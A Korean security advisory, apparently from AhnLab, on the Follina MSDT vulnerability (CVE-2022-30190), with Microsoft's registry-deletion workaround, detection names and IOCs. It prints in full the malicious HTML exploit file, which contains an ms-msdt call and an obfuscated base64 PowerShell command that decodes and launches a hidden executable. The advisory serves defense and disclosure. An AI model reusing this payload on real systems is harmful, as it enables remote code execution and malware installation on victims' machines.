Follina라 지칭되는 신규 취약점 CVE-2022-30190이 공개되었다. MS에 따르면 해당 취약점은 Word와 같은 호출 응용 프로그램에서 URL 프로토콜을 사용하여 MSDT를 호출할 때 원격 코드 실행 취약점이 발생한다. 해당 취약점 발생 시 호출 응용 프로그램의 권한으로 임의 코드를 실행할 수 있으며 추가 프로그램을 설치하거나 데이터 확인 및 변경 또는 삭제가 가능하다.
1. 취약점 악성코드 예시
이 취약점이 확인된 Word문서에서는 기존에 알려진 방식인 External 태그에 작성된 URL 연결을 통해 취약점을 발생시키는 HTML파일이 다운로드 및 실행되면서 발생하였다. (현재는 해당 URL이 활성화되어 있지 않아 추가 동작은 수행되지 않는다.) Word 실행과 동시에 해당 URL에 접근하여 다운로드 된 HTML의 MSDT가 호출되면서 취약점이 발생하여 악의적인 코드 실행이 가능하다.
외부 자료에 공개된 위 RDF8421.html의 내용은 아래 코드와 같으며 주석 하단에 ms-msdt 를 실행하는 코드가 삽입되어 있다. 이러한 형태로 ms-msdt를 통해 공격자가 의도한 코드 실행이 가능하므로 다양한 공격이 가능해진다.
<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-- 중략 --
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../..//Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>
</body>
</html>2. 취약점 대응방안
MS에서 공개한 대응 방안은 아래와 같다.
- MSDT URL 프로토콜을 비활성화
1. 명령 프롬프트(cmd.exe)를 관리자로 실행
2. 레지스트리 키를 백업하기위해 “reg export HKEY_CLASSES_ROOT\ms-msdt filename ” 명령 실행
3. “reg delete HKEY_CLASSES_ROOT\ms-msdt /f” 명령 실행
3. 안랩 제품 대응현황
AhnLab에서는 아래 진단명으로 해당 취약점 파일 및 행위 탐지가 가능하다.
- (파일진단명) Exploit/HTML.CVE-2022-30190.S1841
- (행위진단명) Behavior/MDP.Event.M4313
[IOC]
hxxps://www.xmlformats[.]com/office/word/2022/wordprocessingDrawing/RDF842l.html
52945af1def85b171870b31fa4782e52
d1fe26b84043ac11fa5ddb90906e6d56
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
참고1) https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
참고2) https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
Categories:악성코드 정보
[…] 주의! MS 오피스 제로데이 취약점 Follina (CVE-2022-30190) CHM 악성코드에서 확인된 안티 샌드박스 및 기업 타겟 공격 0 0 votes 별점 주기 […]